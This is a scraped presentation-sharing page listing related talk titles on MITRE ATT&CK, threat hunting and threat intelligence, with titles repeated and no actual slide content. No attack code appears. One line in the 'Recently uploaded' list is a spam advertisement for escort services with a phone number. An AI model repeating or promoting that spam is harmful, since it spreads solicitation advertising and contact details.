From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedMITRE - ATT&CKcon
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Harry McLaren
 

More Related Content

What's hot

MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE - ATT&CKcon
 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
MITRE ATT&CKcon Power Hour - November
MITRE ATT&CKcon Power Hour - NovemberMITRE ATT&CKcon Power Hour - November
MITRE ATT&CKcon Power Hour - NovemberMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE - ATT&CKcon
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshopArpan Raval
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligencePriyanka Aash
 
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE - ATT&CKcon
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You AreKatie Nickels
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 

What's hot (20)

MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?)
 
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK Framework
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
 
MITRE ATT&CKcon Power Hour - November
MITRE ATT&CKcon Power Hour - NovemberMITRE ATT&CKcon Power Hour - November
MITRE ATT&CKcon Power Hour - November
 
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
 
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat Intelligence
 
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark Arts
 

Similar to MITRE ATTACKCon Power Hour - December

From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedMITRE - ATT&CKcon
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Harry McLaren
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Jennifer Burns
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019Thang Nguyen
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckNorth Texas Chapter of the ISSA
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosOuthai SAIOUDOM
 
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting ProgramIDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting ProgramDigit Oktavianto
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersFelipe Prado
 
Cyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptxCyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptxYashSomalkar
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksCiNPA Security SIG
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
 
50+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 202250+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 2022Temok IT Services
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfxererenhosdominaram
 

Similar to MITRE ATTACKCon Power Hour - December (20)

From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have Changed
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019
 
Total E(A)gression defcon
Total E(A)gression defconTotal E(A)gression defcon
Total E(A)gression defcon
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
 
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting ProgramIDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testers
 
Cyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptxCyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptx
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
 
50+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 202250+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 2022
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
 
Super1
Super1Super1
Super1
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 

More from MITRE - ATT&CKcon

ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by AdversariesATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by AdversariesMITRE - ATT&CKcon
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...MITRE - ATT&CKcon
 
MITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - JanuaryMITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - JanuaryMITRE - ATT&CKcon
 
Using ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power PlantsUsing ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power PlantsMITRE - ATT&CKcon
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?MITRE - ATT&CKcon
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?MITRE - ATT&CKcon
 
ATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the MatricesATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the MatricesMITRE - ATT&CKcon
 
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for MobileMapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for MobileMITRE - ATT&CKcon
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionMITRE - ATT&CKcon
 
TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020MITRE - ATT&CKcon
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchMITRE - ATT&CKcon
 
What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?MITRE - ATT&CKcon
 
Starting Over with Sub-Techniques
Starting Over with Sub-TechniquesStarting Over with Sub-Techniques
Starting Over with Sub-TechniquesMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...MITRE - ATT&CKcon
 

More from MITRE - ATT&CKcon (20)

ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 
State of the ATTACK
State of the ATTACKState of the ATTACK
State of the ATTACK
 
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by AdversariesATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
 
MITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - JanuaryMITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - January
 
Using ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power PlantsUsing ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power Plants
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?
 
Putting the PRE into ATTACK
Putting the PRE into ATTACKPutting the PRE into ATTACK
Putting the PRE into ATTACK
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?
 
ATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the MatricesATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the Matrices
 
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for MobileMapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis Question
 
TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
 
What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?
 
Starting Over with Sub-Techniques
Starting Over with Sub-TechniquesStarting Over with Sub-Techniques
Starting Over with Sub-Techniques
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
 
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
 
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
 
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
 

Recently uploaded

Building the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized StorageBuilding the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized StorageTechSoup
 
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...CedZabala
 
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile ServiceCunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile ServiceHigh Profile Call Girls
 
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
